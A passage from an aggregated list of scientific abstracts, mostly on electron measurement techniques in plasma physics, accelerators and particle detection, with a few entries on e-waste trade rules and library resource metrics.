(runaway) discharges and during disruptions. The basic elements of the probe are YSO crystals which transform the energy of runaway electrons into visible light which is guided via optical fibres to photomultipliers. In order to obtain the energy distribution of runaways, the crystals are covered with layers of stainless steel (or tungsten in two earlier test versions) of different thicknesses. The final probe design has 9 crystals and can temporally and spectrally resolve electrons with energies between 4 MeV and 30 MeV. The probe is tested and absolutely calibrated at the linear electron accelerator ELBE in Rossendorf. The measurements are in good agreement with Monte Carlo simulations using the Geant4 code. The runaway transport in the presence of the internal and externally applied magnetic perturbations has been studied. The diffusion coefficient and the value of the magnetic fluctuation for runaways were derived as a function of B{sub t}. It was found that an increase of runaway losses from the plasma with the decreasing toroidal magnetic field is accompanied with a growth of the magnetic fluctuation in the plasma. The magnetic shielding picture could be confirmed which predicts that the runaway loss occurs predominantly for low energy runaways (few MeV) and considerably less for the high energy ones. In the case of the externally applied magnetic perturbations by means of the dynamic 12. TeV electron measurement with CREST experiment Science.gov (United States) Park, Nahee; Anderson, T.; Bower, C.; Coutu, S.; Gennaro, J.; Geske, M.; Muller, D.; Musser, J.; Nutter, S. CREST, the Cosmic Ray Electron Synchrotron Telescope is a balloon-borne experiment de-signed to measure the spectrum of multi-TeV electrons by the detection of the x-ray synchrotron photons generated in the magnetic field of the Earth. Electrons in the TeV range are expected to reflect the properties of local sources because fluxes from remote locations are suppressed by radiative losses during propagation. Since CREST needs to intersect only a portion of the kilometers-long trail of photons generated by the high-energy electron, the method yields a larger effective area than the physical size of the detector, boosting detection areas. The in-strument is composed of an array of 1024 BaF2 crystals and a set of scintillating veto counters. A long duration balloon flight in Antarctica is currently planned for the 2010-11 season. 13. Photoion Auger-electron coincidence measurements near threshold International Nuclear Information System (INIS) Levin, J.C.; Biedermann, C.; Keller, N.; Liljeby, L.; Short, R.T.; Sellin, I.A.; Lindle, D.W. 1990-01-01 The vacancy cascade which fills an atomic inner-shell hole is a complex process which can proceed by a variety of paths, often resulting in a broad distribution of photoion charge states. We have measured simplified argon photoion charge distributions by requiring a coincidence with a K-LL or K-LM Auger electron, following K excitation with synchrotron radiation, as a function of photon energy, and report here in detail the argon charge distributions coincident with K-L 1 L 23 Auger electrons. The distributions exhibit a much more pronounced photon-energy dependence than do the more complicated non-coincident spectra. Resonant excitation of the K electron to np levels, shakeoff of these np electrons by subsequent decay processes, double-Auger decay, and recapture of the K photoelectron through postcollision interaction occur with significant probability. 17 refs 14. Direct electronic measurement of Peltier cooling and heating in graphene. Science.gov (United States) Vera-Marun, I J; van den Berg, J J; Dejene, F K; van Wees, B J 2016-05-10 Thermoelectric effects allow the generation of electrical power from waste heat and the electrical control of cooling and heating. Remarkably, these effects are also highly sensitive to the asymmetry in the density of states around the Fermi energy and can therefore be exploited as probes of distortions in the electronic structure at the nanoscale. Here we consider two-dimensional graphene as an excellent nanoscale carbon material for exploring the interaction between electronic and thermal transport phenomena, by presenting a direct and quantitative measurement of the Peltier component to electronic cooling and heating in graphene. Thanks to an architecture including nanoscale thermometers, we detected Peltier component modulation of up to 15 mK for currents of 20 μA at room temperature and observed a full reversal between Peltier cooling and heating for electron and hole regimes. This fundamental thermodynamic property is a complementary tool for the study of nanoscale thermoelectric transport in two-dimensional materials. 15. Measurements of Lunar Dust Charging Properties by Electron Impact Science.gov (United States) Abbas, Mian M.; Tankosic, Dragana; Craven, Paul D.; Schneider, Todd A.; Vaughn, Jason A.; LeClair, Andre; Spann, James F.; Norwood, Joseph K. 2009-01-01 Dust grains in the lunar environment are believed to be electrostatically charged predominantly by photoelectric emissions resulting from solar UV radiation on the dayside, and on the nightside by interaction with electrons in the solar wind plasma. In the high vacuum environment on the lunar surface with virtually no atmosphere, the positive and negative charge states of micron/submicron dust grains lead to some unusual physical and dynamical dust phenomena. Knowledge of the electrostatic charging properties of dust grains in the lunar environment is required for addressing their hazardous effect on the humans and mechanical systems. It is well recognized that the charging properties of individual small micron size dust grains are substantially different from the measurements on bulk materials. In this paper we present the results of measurements on charging of individual Apollo 11 and Apollo 17 dust grains by exposing them to mono-energetic electron beams in the 10-100 eV energy range. The charging/discharging rates of positively and negatively charged particles of approx. 0.1 to 5 micron radii are discussed in terms of the sticking efficiencies and secondary electron yields. The secondary electron emission process is found to be a complex and effective charging/discharging mechanism for incident electron energies as low as 10-25 eV, with a strong dependence on particle size. Implications of the laboratory measurements on the nature of dust grain charging in the lunar environment are discussed. 16. Effects of toroidal field ripple on suprathermal ions in tokamak plasmas International Nuclear Information System (INIS) Goldston, R.J.; Towner, H.H. 1980-02-01 Analytic calculations of three important effects of toroidal field ripple on suprathermal ions in tokamak plasmas are presented. In the first process, collisional ripple-trapping, beam ions become trapped in local magnetic wells near their banana tips due to pitch-angle scattering as they traverse the ripple on barely unripple-trapped orbits. In the second process, collisionless ripple-trapping, near-perpendicular untrapped ions are captured (again near a banana tip) due to their finite orbits, which carry them out into regions of higher ripple. In the third process, banana-drift diffusion, fast-ion banana orbits fail to close precisely, due to a ripple-induced variable lingering period near the banana tips. These three mechanisms lead to substantial radial transport of banana-trapped, neutral-beam-injected ions when the quantity α* identical with epsilon/sin theta/Nqdelta is of order unity or smaller 17. Effects of toroidal field ripple on suprathermal ions in tokamak plasmas International Nuclear Information System (INIS) Goldston, R.J.; Towner, H.H. 1981-01-01 Analytic calculations of three important effects of toroidal field ripple on suprathermal ions in tokamak plasmas are presented. In the first process, collisional ripple-trapping, ions become trapped in local magnetic wells near their banana tips owing to pitch-angle scattering as they traverse the ripple on barely unripple-trapped orbits. In the second process, collisionless ripple-trapping, ions are captured (again near a banana tip) owing to their finite orbits, which carry them out into regions of higher ripple. In the third process, banana-drift diffusion, fast-ion banana orbits fail to close precisely, due to a ripple-induced 'variable lingering period' near the banana tips. These three mechanisms lead to substantial radial transport of banana-trapped, neutral-beam-injected ions when the quantity α* is identical with epsilonsinthetaNqdelta is of order unity or smaller. (author) 18. Suprathermal ions in the solar wind from the Voyager spacecraft: Instrument modeling and background analysis International Nuclear Information System (INIS) Randol, B M; Christian, E R 2015-01-01 Using publicly available data from the Voyager Low Energy Charged Particle (LECP) instruments, we investigate the form of the solar wind ion suprathermal tail in the outer heliosphere inside the termination shock. This tail has a commonly observed form in the inner heliosphere, that is, a power law with a particular spectral index. The Voyager spacecraft have taken data beyond 100 AU, farther than any other spacecraft. However, during extended periods of time, the data appears to be mostly background. We have developed a technique to self-consistently estimate the background seen by LECP due to cosmic rays using data from the Voyager cosmic ray instruments and a simple, semi-analytical model of the LECP instruments 19. Why and How to Measure the Use of Electronic Resources Directory of Open Access Journals (Sweden) Jean Bernon 2008-11-01 Full Text Available A complete overview of library activity implies a complete and reliable measurement of the use of both electronic resources and printed materials. This measurement is based on three sets of definitions: document types, use types and user types. There is a common model of definitions for printed materials, but a lot of questions and technical issues remain for electronic resources. In 2006 a French national working group studied these questions. It relied on the COUNTER standard, but found it insufficient and pointed out the need for local tools such as web markers and deep analysis of proxy logs. Within the French national consortium COUPERIN, a new working group is testing ERMS, SUSHI standards, Shibboleth authentication, along with COUNTER standards, to improve the counting of the electronic resources use. At this stage this counting is insufficient and its improvement will be a European challenge for the future. 20. Miniature electron bombardment evaporation source: evaporation rate measurement International Nuclear Information System (INIS) Nehasil, V.; Masek, K.; Matolin, V.; Moreau, O. 1997-01-01 Miniature electron beam evaporation sources which operate on the principle of vaporization of source material, in the form of a tip, by electron bombardment are produced by several companies specialized in UHV equipment. These sources are used primarily for materials that are normally difficult to deposit due to their high evaporation temperature. They are appropriate for special applications such as heteroepitaxial thin film growth requiring a very low and well controlled deposition rate. A simple and easily applicable method of evaporation rate control is proposed. The method is based on the measurement of ion current produced by electron bombardment of evaporated atoms. The absolute evaporation flux values were measured by means of the Bayard-Alpert ion gauge, which enabled the ion current vs evaporation flux calibration curves to be plotted. (author). 1 tab., 4 figs., 6 refs 1. Secondary electron measurement and XPS characterization of NEG coatings International Nuclear Information System (INIS) Sharma, R. K.; Sinha, Atul K.; Gupta, Nidhi; Nuwad, J.; Jagannath,; Gadkari, S. C.; Singh, M. R.; Gupta, S. K. 2014-01-01 Ternary alloy coatings of IVB and VB materials provide many of benefits over traditional material surfaces such as creation of extreme high vacuum(XHV), lower secondary electron yield(SEY), low photon desorption coefficient. XHV (pressure −10 mbar) is very useful to the study of surfaces of the material in as it is form, high energy particle accelerators(LHC, Photon Factories), synchrotrons (ESRF, Ellectra) etc.. Low secondary electron yield leads to very low multi-pacting utilizes to increase beam life time. In this paper preparation of the coatings and a study of secondary electron yield measurement after heating at different temperatures has been shown also results of their surface characterization based on shift in binding energy has been produced using the surface techniques XPS. Stoichiometry of the film was measured by Energy dispersive x-ray analysis (EDX) 2. Emittance Measurements from a Laser Driven Electron Injector Energy Technology Data Exchange (ETDEWEB) Reis, David A 2003-07-28 The Gun Test Facility (GTF) at the Stanford Linear Accelerator Center was constructed to develop an appropriate electron beam suitable for driving a short wavelength free electron laser (FEL) such as the proposed Linac Coherent Light Source (LCLS). For operation at a wavelength of 1.5 {angstrom}, the LCLS requires an electron injector that can produce an electron beam with approximately 1 {pi} mm-mrad normalized rms emittance with at least 1 nC of charge in a 10 ps or shorter bunch. The GTF consists of a photocathode rf gun, emittance-compensation solenoid, 3 m linear accelerator (linac), drive laser, and diagnostics to measure the beam. The rf gun is a symmetrized 1.6 cell, s-band high gradient, room temperature, photocathode structure. Simulations show that this gun when driven by a temporally and spatially shaped drive laser, appropriately focused with the solenoid, and further accelerated in linac can produce a beam that meets the LCLS requirements. This thesis describes the initial characterization of the laser and electron beam at the GTF. A convolved measurement of the relative timing between the laser and the rf phase in the gun shows that the jitter is less than 2.5 ps rms. Emittance measurements of the electron beam at 35 MeV are reported as a function of the (Gaussian) pulse length and transverse profile of the laser as well as the charge of the electron beam at constant phase and gradient in both the gun and linac. At 1 nC the emittance was found to be {approx} 13 {pi} mm-mrad for 5 ps and 8 ps long laser pulses. At 0.5 nC the measured emittance decreased approximately 20% in the 5 ps case and 40% in the 8 ps case. These measurements are between 40-80% higher than simulations for similar experimental conditions. In addition, the thermal emittance of the electron beam was measured to be 0.5 {pi} mm-mrad. 3. Measurements of plasma temperature and electron density in laser Indian Academy of Sciences (India) The temperature and electron density characterizing the plasma are measured by time-resolved spectroscopy of neutral atom and ion line emissions in the time window of 300–2000 ns. An echelle spectrograph coupled with a gated intensified charge coupled detector is used to record the plasma emissions. 4. Trade Measures for Regulating Transboundary Movement of Electronic Waste Directory of Open Access Journals (Sweden) Gideon Emcee Christian 2017-08-01 Full Text Available International trade in used electrical and electronics equipment (UEEE provides an avenue for socio-economic development in the developing world and also serves as a conduit for transboundary dumping of waste electrical and electronic equipment (WEEE also referred to as electronic waste or e-waste. The latter problem arises from the absence of a regulatory framework for differentiating between functional UEEE and junk e-waste. This has resulted in both functional UEEE and junk e-waste being concurrently shipped to developing countries under the guise of international trade in used electronics. Dealing with these problems will require effective regulation of international trade in UEEE from both exporting and importing countries. Although, the export of e-waste from the European Community to developing countries is currently prohibited, significant amount of e-waste from the region continue to flow into developing countries due to lax regulatory measures in the latter. Hence, there is need for a regulatory regime in developing countries to complement the prohibitory regime in the major e-waste source countries. This paper proposes trade measures modelled in line with WTO rules which could be adopted by developing countries in addressing these problems. The proposed measures include the development of a compulsory certification and labelling system for functional UEEE as well as trade ban on commercial importation of UEEE not complying with the said certification and labelling system. The paper then goes further to examine these proposed measures in the light of WTO rules and jurisprudence. 5. Electron density measurement in an evolving plasma. Experimental devices International Nuclear Information System (INIS) Consoli, Terenzio; Dagai, Michel 1960-01-01 The experimental devices described here allow the electron density measurements in the 10 16 e/m 3 to 10 20 e/m 3 interval. Reprint of a paper published in Comptes rendus des seances de l'Academie des Sciences, t. 250, p. 1223-1225, sitting of 15 February 1960 [fr 6. Measuring and recording system for electron beam welding parameters International Nuclear Information System (INIS) Lobanova, N.G.; Lifshits, M.L.; Efimov, I.I. 1987-01-01 The observation possibility during electron beam welding of circular articles with guaranteed clearance of welding bath leading front in joint gap and flare cloud over the bath by means of television monitor is considered. The composition and operation mode of television measuring system for metric characteristics of flare cloud and altitude of welding bath leading front in the clearance are described 7. Measurements of the electron and muon inclusive cross-sections Indian Academy of Sciences (India) We present the measurements of the differential cross-sections for inclusive electron and muon production in proton–proton collisions at a centre-of-mass energy of s = 7 TeV, using ∼ 1.4 pb-1 of data collected by the ATLAS detector at the Large Hadron Collider. The muon cross-section is measured as a function of muon ... 8. Electron density profile measurements by microwave reflectometry on Tore Supra International Nuclear Information System (INIS) Clairet, F.; Paume, M.; Chareau, J.M. 1995-01-01 A proposal is presented developing reflectometry diagnostic for electron density profile measurements as routine diagnostic without manual intervention as achieved at JET. Since density fluctuations seriously perturb the reflected signal and the measurement of the group delay, a method is described to overcome the irrelevant results with the help of an adaptive filtering technique. Accurate profiles are estimated for about 70% of the shots. (author) 3 refs.; 6 figs 9. Electron cyclotron emission measurements on JET: Michelson interferometer, new absolute calibration, and determination of electron temperature. Science.gov (United States) Schmuck, S; Fessey, J; Gerbaud, T; Alper, B; Beurskens, M N A; de la Luna, E; Sirinelli, A; Zerbini, M 2012-12-01 At the fusion experiment JET, a Michelson interferometer is used to measure the spectrum of the electron cyclotron emission in the spectral range 70-500 GHz. The interferometer is absolutely calibrated using the hot/cold technique and, in consequence, the spatial profile of the plasma electron temperature is determined from the measurements. The current state of the interferometer hardware, the calibration setup, and the analysis technique for calibration and plasma operation are described. A new, full-system, absolute calibration employing continuous data acquisition has been performed recently and the calibration method and results are presented. The noise level in the measurement is very low and as a result the electron cyclotron emission spectrum and thus the spatial profile of the electron temperature are determined to within ±5% and in the most relevant region to within ±2%. The new calibration shows that the absolute response of the system has decreased by about 15% compared to that measured previously and possible reasons for this change are presented. Temperature profiles measured with the Michelson interferometer are compared with profiles measured independently using Thomson scattering diagnostics, which have also been recently refurbished and recalibrated, and agreement within experimental uncertainties is obtained. 10. Electron density measurements during ion beam transport on Gamble II International Nuclear Information System (INIS) Weber, B.V.; Hinshelwood, D.D.; Neri, J.M.; Ottinger, P.F.; Rose, D.V.; Stephanakis, S.J.; Young, F.C. 1999-01-01 High-sensitivity laser interferometry was used to measure the electron density created when an intense proton beam (100 kA, 1 MeV, 50 ns) from the Gamble II generator was transported through low-pressure gas as part of a project investigating Self-Pinched Transport (SPT) of intense ion beams. This measurement is non-perturbing and sufficiently quantitative to allow benchmarking of codes (particularly IPROP) used to model beam-gas interaction and ion-beam transport. Very high phase sensitivity is required for this measurement. For example, a 100-kA, 1-MeV, 10-cm-radius proton beam with uniform current density has a line-integrated proton density equal to n b L = 3 x 10 13 cm -2 . An equal electron line-density, n e L = n b L, (expected for transport in vacuum) will be detected as a phase shift of the 1.064 microm laser beam of only 0.05degree, or an optical path change of 1.4 x 10 -4 waves (about the size of a hydrogen atom). The time-history of the line-integrated electron density, measured across a diameter of the transport chamber at 43 cm from the input aperture, starts with the proton arrival time and decays differently depending on the gas pressure. The gas conditions included vacuum (10 -4 Torr air), 30 to 220 mTorr He, and 1 Torr air. The measured densities vary by three orders of magnitude, from 10 13 to 10 16 cm -2 for the range of gas pressures investigated. In vacuum, the measured electron densities indicate only co-moving electrons (n e L approximately n b L). In He, when the gas pressure is sufficient for ionization by beam particles and SPT is observed, n e L increases to about 10 n b L. At even higher pressures where electrons contribute to ionization, even higher electron densities are observed with an ionization fraction of about 2%. The diagnostic technique as used on the SPT experiment will be described and a summary of the results will be given. The measurements are in reasonable agreement with theoretical predictions from the IPROP code 11. Energy of auroral electrons and Z mode generation Science.gov (United States) Krauss-Varban, D.; Wong, H. K. 1990-01-01 The present consideration of Z-mode radiation generation, in light of observational results indicating that the O mode and second-harmonic X-mode emissions can prevail over the X-mode fundamental radiation when suprathermal electron energy is low, gives attention to whether the thermal effect on the Z-mode dispersion can be equally important, and whether the Z-mode can compete for the available free-energy source. It is found that, under suitable circumstances, the growth rate of the Z-mode can be substantial even for low suprathermal auroral electron energies. Growth is generally maximized for propagation perpendicular to the magnetic field. 12. Experimental measurement of electron heat diffusivity in a tokamak International Nuclear Information System (INIS) Callen, J.D.; Jahns, G.L. 1976-06-01 The electron temperature perturbation produced by internal disruptions in the center of the Oak Ridge Tokamak (ORMAK) is followed with a multi-chord soft x-ray detector array. The space-time evolution is found to be diffusive in character, with a conduction coefficient larger by a factor of 2.5 - 15 than that implied by the energy containment time, apparently because it is a measurement for the small group of electrons whose energies exceed the cut-off energy of the detectors 13. Electron temperature measurement of tungsten inert gas arcs International Nuclear Information System (INIS) Tanaka, Manabu; Tashiro, Shinichi 2008-01-01 In order to make clear the physical grounds of deviations from LTE (Local Thermodynamic Equilibrium) in the atmospheric helium TIG arcs electron temperature and LTE temperature obtained from electron number density were measured by using of line-profile analysis of the laser scattering method without an assumption of LTE. The experimental results showed that in comparison with the argon TIG arcs, the region where a deviation from LTE occurs tends to expand in higher arc current because the plasma reaches the similar state to LTE within shorter distance from the cathode due to the slower cathode jet velocity 14. Imaging and Measuring Electron Beam Dose Distributions Using Holographic Interferometry DEFF Research Database (Denmark) Miller, Arne; McLaughlin, W. L. 1975-01-01 Holographic interferometry was used to image and measure ionizing radiation depth-dose and isodose distributions in transparent liquids. Both broad and narrowly collimated electron beams from accelerators (2–10 MeV) provided short irradiation times of 30 ns to 0.6 s. Holographic images...... and measurements of absorbed dose distributions were achieved in liquids of various densities and thermal properties and in water layers thinner than the electron range and with backings of materials of various densities and atomic numbers. The lowest detectable dose in some liquids was of the order of a few k......Rad. The precision limits of the measurement of dose were found to be ±4%. The procedure was simple and the holographic equipment stable and compact, thus allowing experimentation under routine laboratory conditions and limited space.... 15. Electron Bunch Length Measurement for LCLS at SLAC International Nuclear Information System (INIS) Zelazny, M.; Allison, S.; Chevtsov, Sergei; Emma, P.; Kotturi, K.d.; Loos, H.; Peng, S.; Rogind, D.; Straumann, T. 2007-01-01 At Stanford Linear Accelerator Center (SLAC) a Bunch Length Measurement system has been developed to measure the length of the electron bunch for its new Linac Coherent Light Source (LCLS). This destructive measurement uses a transverse-mounted RF deflector (TCAV) to vertically streak the electron beam and an image taken with an insertable screen and a camera. The device control software was implemented with the Experimental Physics and Industrial Control System (EPICS) toolkit. The analysis software was implemented in Matlab(trademark) using the EPICS/Channel Access Interface for Scilab(trademark) and Matlab(trademark) (labCA). This architecture allowed engineers and physicists to develop and integrate their control and analysis without duplication of effort 16. Two old ways to measure the electron-neutrino mass CERN Document Server De Rújula, A 2013-01-01 Three decades ago, the measurement of the electron neutrino mass in atomic electron capture (EC) experiments was scrutinized in its two variants: single EC and neutrino-less double EC. For certain isotopes an atomic resonance enormously enhances the expected decay rates. The favoured technique, based on calorimeters as opposed to spectrometers, has the advantage of greatly simplifying the theoretical analysis of the data. After an initial surge of measurements, the EC approach did not seem to be competitive. But very recently, there has been great progress on micro-calorimeters and the measurement of atomic mass differences. Meanwhile, the beta-decay neutrino-mass limits have improved by a factor of 15, and the difficulty of the experiments by the cube of that figure. Can the "calorimetric" EC theory cope with this increased challenge? I answer this question affirmatively. In so doing I briefly review the subject and extensively address some persistent misunderstandings of the underlying quantum physics. 17. Electron bunchlength measurement from analysis of fluctuations in spontaneous emission International Nuclear Information System (INIS) Catravas, P.; Leemans, W.P.; Wurtele, J.S.; Zolotorev, M.S.; Babzien, M.; Ben-Zvi, I.; Segalov, Z.; Wang, X.; Yakimenko, V. 1999-01-01 A statistical analysis of fluctuations in the spontaneous emission of a single bunch of electrons is shown to provide a new bunchlength diagnostic. This concept, originally proposed by Zolotorev and Stupakov [1], is based on the fact that shot noise from a finite bunch has a correlation length defined by the bunchlength, and therefore has a spiky spectrum. Single shot spectra of wiggler spontaneous emission have been measured at 632 nm from 44 MeV single electron bunches of 1 - 5 ps. The scaling of the spectral fluctuations with frequency resolution and the scaling of the spectral intensity distribution with bunchlength are studied. Bunchlength was extracted in a single shot measurement. Agreement was obtained between the experiment and a theoretical model, and with independent time integrated measurements. copyright 1999 American Institute of Physics 18. Measuring processes with opto-electronic semiconductor components International Nuclear Information System (INIS) 1985-01-01 This is a report on the state of commercially available semiconductor emitters and detectors for the visible, near, middle and remote infrared range. A survey is given on the distance, speed, flow and length measuring techniques using opto-electronic components. Automatic focussing, the use of light barriers, non-contact temperature measurements, spectroscopic gas, liquid and environmental measurement techniques and gas analysis in medical techniques show further applications of the new components. The modern concept of guided radiation in optical fibres and their use in system technology is briefly explained. (DG) [de 19. Observation and interpretation of particle and electric field measurements inside and adjacent to an active auroral arc International Nuclear Information System (INIS) Carlson, C.W.; Kelley, M.C. 1977-01-01 A Javelin sounding rocket instrumented to measure electric fields, energetic particles, and suprathermal electrons was flown across an auroral display in the late expansion phase of a substorm. Four distinct regions of fields and particles were interpreted here in light of our present understanding of auroral dynamics.r of 10 and resemble fluxes mesured in the equatorial plane during the expansion phase. The hard fluxes in the equatorward zone are further energized and may act as a source for the outer radiation belt as inward convection further energizes them 20. Positron lifetime measurements on electron irradiated amorphous alloys International Nuclear Information System (INIS) Moser, P.; Hautojaervi, P.; Chamberod, A.; Yli-Kauppila, J.; Van Zurk, R. 1981-08-01 Great advance in understanding the nature of point defects in crystalline metals has been achieved by employing positron annihilation technique. Positrons detect vacancy-type defects and the lifetime value of trapped positrons gives information on the size of submicroscopic vacancy aglomerates and microvoids. In this paper it is shown that low-temperature electron irradiations can result in a considerable increase in the positron lifetimes in various amorphous alloys because of the formation of vacancy-like defects which, in addition of the pre-existing holes, are able to trap positrons. Studied amorphous alloys were Fe 80 B 20 , Pd 80 Si 20 , Cu 50 Ti 50 , and Fe 40 Ni 40 P 14 B 6 . Electron irradiations were performed with 3 MeV electrons at 20 K to doses around 10 19 e - /cm 2 . After annealing positron lifetime spectra were measured at 77 K 1. Dose measurement during defectoscopic work using electronic personal dosimeters International Nuclear Information System (INIS) Smoldasova, J. 2008-01-01 Personal monitoring of the external radiation of radiation, personnel exposed to sources of ionizing radiation at a workplace is an important task of the radiological protection. Information based on the measured quantities characterizing the level of the exposure of radiation personnel enable to assess the optimum radiological protection at the relevant workplace and ascertain any deviation from the normal operation in time. Different types of personal dosimeters are used to monitor the external radiation of radiation personnel. Basically, there are two types of dosimeters, passive and active (electronic). Passive dosimeters provide information on the dose of exposure after its evaluation, while electronic dosimeters provide this information instantly. The goal of the work is to compare data acquired during different working activities using the DMC 2000 XB electronic dosimeters and the passive film dosimeters currently used at the defectoscopic workplace. (authors) 2. Portable audio electronics for impedance-based measurements in microfluidics International Nuclear Information System (INIS) Wood, Paul; Sinton, David 2010-01-01 We demonstrate the use of audio electronics-based signals to perform on-chip electrochemical measurements. Cell phones and portable music players are examples of consumer electronics that are easily operated and are ubiquitous worldwide. Audio output (play) and input (record) signals are voltage based and contain frequency and amplitude information. A cell phone, laptop soundcard and two compact audio players are compared with respect to frequency response; the laptop soundcard provides the most uniform frequency response, while the cell phone performance is found to be insufficient. The audio signals in the common portable music players and laptop soundcard operate in the range of 20 Hz to 20 kHz and are found to be applicable, as voltage input and output signals, to impedance-based electrochemical measurements in microfluidic systems. Validated impedance-based measurements of concentration (0.1–50 mM), flow rate (2–120 µL min −1 ) and particle detection (32 µm diameter) are demonstrated. The prevailing, lossless, wave audio file format is found to be suitable for data transmission to and from external sources, such as a centralized lab, and the cost of all hardware (in addition to audio devices) is ∼10 USD. The utility demonstrated here, in combination with the ubiquitous nature of portable audio electronics, presents new opportunities for impedance-based measurements in portable microfluidic systems. (technical note) 3. Rocket potential measurements during electron beam injection into the ionosphere International Nuclear Information System (INIS) Gringauz, K.I.; Shutte, N.M. 1981-01-01 Electron flux measurements were made during pulsed injection of electron beams at a current of about 0.5 A and energy of 15 or 27 keV, using a retarding potential analyzer which was mounted on the lateral surface of the Eridan rocket during the ARAKS experiment of January 26, 1975. The general character of the retardation curves was found to be the same regardless of the electron injection energy, and regardless of the fact whether the plasma generator, injecting quasineutral cesium plasma with an ion current of about 10 A, was switched on. A sharp current increase in the interval between 10 to the -7th and 10 to the -6th A was observed with a decrease of the retarding potential. The rocket potential did not exceed approximately 150 V at about 130 to 190 km, and decreased to 20 V near 100 km. This was explained by the formation of a highly conducting region near the rocket, which was formed via intense plasma waves generated by the beam. Measurements of electron fluxes with energies of 1 to 3 keV agree well with estimates based on the beam plasma discharge theory 4. Measurement of centroid trajectory of Dragon-I electron beam International Nuclear Information System (INIS) Jiang Xiaoguo; Wang Yuan; Zhang Wenwei; Zhang Kaizhi; Li Jing; Li Chenggang; Yang Guojun 2005-01-01 The control of the electron beam in an intense current linear induction accelerator (LIA) is very important. The center position of the electron beam and the beam profile are two important parameters which should be measured accurately. The setup of a time-resolved measurement system and a data processing method for determining the beam center position are introduced for the purpose of obtaining Dragon-I electron beam trajectory including beam profile. The actual results show that the centroid position error can be controlled in one to two pixels. the time-resolved beam centroid trajectory of Dragon-I (18.5 MeV, 2 kA, 90 ns) is obtained recently in 10 ns interval, 3 ns exposure time with a multi-frame gated camera. The results show that the screw movement of the electron beam is mainly limited in an area with a radius of 0.5 mm and the time-resolved diameters of the beam are 8.4 mm, 8.8 mm, 8.5 mm, 9.3 mm and 7.6 mm. These results have provided a very important support to several research areas such as beam trajectory tuning and beam transmission. (authors) 5. New technique for measurement of electron attachment to molecules International Nuclear Information System (INIS) Harding, T.W. 1984-01-01 One of the goals of this dissertation was to develop a faster method of measuring the attachment properties of molecules. An apparatus was successfully developed that employs a pair of coaxial cylindrical electrodes with the inner one serving also as a pulsed photoelectron source. An electron swarm is driven radially outward through a mixture of an attaching gas and a buffer gas. Both the electrons and resulting negative ions are detected as time-resolved currents by a cylindrical detector contained within the outer electrode as a Faraday cage. Data collection and analysis are handled by a minicomputer based data acquisition system with two independent digitizers. Data were obtained for oxygen in helium or nitrogen as a buffer gas and for sulfur dioxide in helium. Attaching gas percentage were generally below 1%. The electric field to number density ratio was in the range of 1.7 x 10 -19 to 3.8 X 10 -18 V cm 2 . Attachment coefficients were obtained firstly by treating the negative ion currents as a measure of electron attenuation through a gas mixture and secondly by reconstructing the spatial distribution of negative ions at the time of electron passage from the time-resolved currents 6. Note on measuring electronic stopping of slow ions Science.gov (United States) Sigmund, P.; Schinner, A. 2017-11-01 Extracting stopping cross sections from energy-loss measurements requires careful consideration of the experimental geometry. Standard procedures for separating nuclear from electronic stopping treat electronic energy loss as a friction force, ignoring its dependence on impact parameter. In the present study we find that incorporating this dependence has a major effect on measured stopping cross sections, in particular for light ions at low beam energies. Calculations have been made for transmission geometry, nuclear interactions being quantified by Bohr-Williams theory of multiple scattering on the basis of a Thomas-Fermi-Molière potential, whereas electronic interactions are characterized by Firsov theory or PASS code. Differences between the full and the restricted stopping cross section depend on target thickness and opening angle of the detector and need to be taken into account in comparisons with theory as well as in applications of stopping data. It follows that the reciprocity principle can be violated when checked on restricted instead of full electronic stopping cross sections. Finally, we assert that a seeming gas-solid difference in stopping of low-energy ions is actually a metal-insulator difference. In comparisons with experimental results we mostly consider proton data, where nuclear stopping is only a minor perturbation. 7. Measurement of neutrino flux from neutrino-electron elastic scattering Science.gov (United States) Park, J.; Aliaga, L.; Altinok, O.; Bellantoni, L.; Bercellie, A.; Betancourt, M.; Bodek, A.; Bravar, A.; Budd, H.; Cai, T.; Carneiro, M. F.; Christy, M. E.; Chvojka, J.; da Motta, H.; Dytman, S. A.; Díaz, G. A.; Eberly, B.; Felix, J.; Fields, L.; Fine, R.; Gago, A. M.; Galindo, R.; Ghosh, A.; Golan, T.; Gran, R.; Harris, D. A.; Higuera, A.; Kleykamp, J.; Kordosky, M.; Le, T.; Maher, E.; Manly, S.; Mann, W. A.; Marshall, C. M.; Martinez Caicedo, D. A.; McFarland, K. S.; McGivern, C. L.; McGowan, A. M.; Messerly, B.; Miller, J.; Mislivec, A.; Morfín, J. G.; Mousseau, J.; Naples, D.; Nelson, J. K.; Norrick, A.; Nuruzzaman; Osta, J.; Paolone, V.; Patrick, C. E.; Perdue, G. N.; Rakotondravohitra, L.; Ramirez, M. A.; Ray, H.; Ren, L.; Rimal, D.; Rodrigues, P. A.; Ruterbories, D.; Schellman, H.; Solano Salinas, C. J.; Tagg, N.; Tice, B. G.; Valencia, E.; Walton, T.; Wolcott, J.; Wospakrik, M.; Zavala, G.; Zhang, D.; Miner ν A Collaboration 2016-06-01 Muon-neutrino elastic scattering on electrons is an observable neutrino process whose cross section is precisely known. Consequently a measurement of this process in an accelerator-based νμ beam can improve the knowledge of the absolute neutrino flux impinging upon the detector; typically this knowledge is limited to ˜10 % due to uncertainties in hadron production and focusing. We have isolated a sample of 135 ±17 neutrino-electron elastic scattering candidates in the segmented scintillator detector of MINERvA, after subtracting backgrounds and correcting for efficiency. We show how this sample can be used to reduce the total uncertainty on the NuMI νμ flux from 9% to 6%. Our measurement provides a flux constraint that is useful to other experiments using the NuMI beam, and this technique is applicable to future neutrino beams operating at multi-GeV energies. 8. Measurement of electron blockage factors for mamma scars International Nuclear Information System (INIS) Marques Fraguela, E.; Suero Rodrigo, M. A. 2011-01-01 Pencil Beam algorithm XiO CMS scheduler uses the applicator factor, instead of blocking factor in the calculation of monitor units (MU) shaped electron fields. This feature makes the algorithm for calculating an input field the same dose in the beam axis than it would if it were not blocked. It should, therefore, to correct the UM that provides the planner by a factor. The blocks used in electron treatment of the surgical mamma cancers often have a narrow elongated shape following the contour of the scar. Such openings have difficulty measuring the blocking factor with plane-parallel chambers recommended by national and international protocols (eg PTW Roos 34 001) as being so narrow that sometimes the camera is not completely irradiated. In this paper, we study the possibility of using a PTW 30010 Farmer cylindrical chamber for measuring the blocking factor of such openings. 9. Electron-Scale Measurements of Magnetic Reconnection in Space Science.gov (United States) Burch, J. L.; Torbert, R. B.; Phan, T. D.; Chen, L.-J.; Moore, T. E.; Ergun, R. E.; Eastwood, J. P.; Gershman, D. J.; Cassak, P. A.; Argall, M. R.; hide 2016-01-01 Magnetic reconnection is a 